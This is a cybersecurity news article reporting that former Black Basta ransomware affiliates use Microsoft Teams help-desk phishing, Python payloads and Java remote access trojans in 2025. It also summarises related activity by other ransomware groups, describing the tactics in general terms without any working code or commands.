Ex-Black Basta Hackers Strike Back in 2025 with Microsoft Teams Phishing and Python-Powered Attacks

Former Black Basta Affiliates Resurface with Microsoft Teams Phishing and Python Malware in 2025

Former members of the Black Basta ransomware group are making a comeback with familiar—yet increasingly sophisticated—tactics, including Microsoft Teams phishing and Python-based malware delivery.

According to a report by ReliaQuest, these threat actors are now executing malicious Python scripts via cURL requests to drop payloads, expanding on their traditional strategy of email spamming and Teams-based social engineering.

Between February and May 2025, half of all Teams phishing attempts originated from onmicrosoft[.]com domains. Additionally, 42% of the attacks came from previously breached domains—allowing attackers to impersonate legitimate communications and slip past defenses.

Sectors Targeted: Finance, Insurance, and Construction

ReliaQuest observed multiple incidents where attackers posed as IT help desk personnel via Teams to lure employees into remote desktop sessions using tools like Quick Assist and AnyDesk. Once inside, they dropped Python scripts from external servers to establish command-and-control (C2).

These tactics mirror past Black Basta strategies but are now being seen in use by newer ransomware gangs, such as BlackSuit, suggesting overlap in membership or technique adoption.

Likely Alliances: CACTUS and DragonForce

Following the shutdown of Black Basta’s data-leak site, researchers suspect former members have joined or allied with the CACTUS ransomware group—with leaked chats revealing a $500–600K transaction between Black Basta’s leader and CACTUS.

Other affiliates may have migrated to BlackLock, which is rumored to collaborate with a ransomware cartel known as DragonForce.

Malware Evolution: RATs, Google Drive, and Credential Theft

The attackers are using access gained via phishing to deploy advanced Java-based remote access trojans (RATs)—capable of file transfers, SOCKS5 tunneling, credential theft, and in-memory execution via Google Drive and OneDrive.

According to Rapid7, the malware continues to evolve and is now leveraging cloud services from Google and Microsoft to evade detection.

Related Threat Landscape Developments

• Scattered Spider is exploiting MSPs and IT vendors using Evilginx phishing to bypass MFA and align with groups like ALPHV, RansomHub, and DragonForce.

• Qilin/Agenda has launched a campaign using Fortinet FortiGate vulnerabilities like CVE-2024-21762 and CVE-2024-55591.

• The Play ransomware group is exploiting SimpleHelp vulnerabilities (CVE-2024-57727), targeting nearly 900 organizations as of May 2025.

• The VanHelsing group leaked its own ransomware source code due to internal conflicts.

• Interlock has deployed a new Node.js-based RAT called NodeSnake, seen in attacks on UK education and government sectors.

"RATs give attackers persistent access and the ability to deploy further tooling or exfiltrate data," said Quorum Cyber. "They’re increasingly central to maintaining long-term control of compromised environments."

As 2025 unfolds, organizations must be alert to new variants of old tactics—especially in environments using cloud platforms and collaborative tools like Microsoft Teams. The combination of phishing, social engineering, and custom malware is proving to be both effective and dangerously adaptable.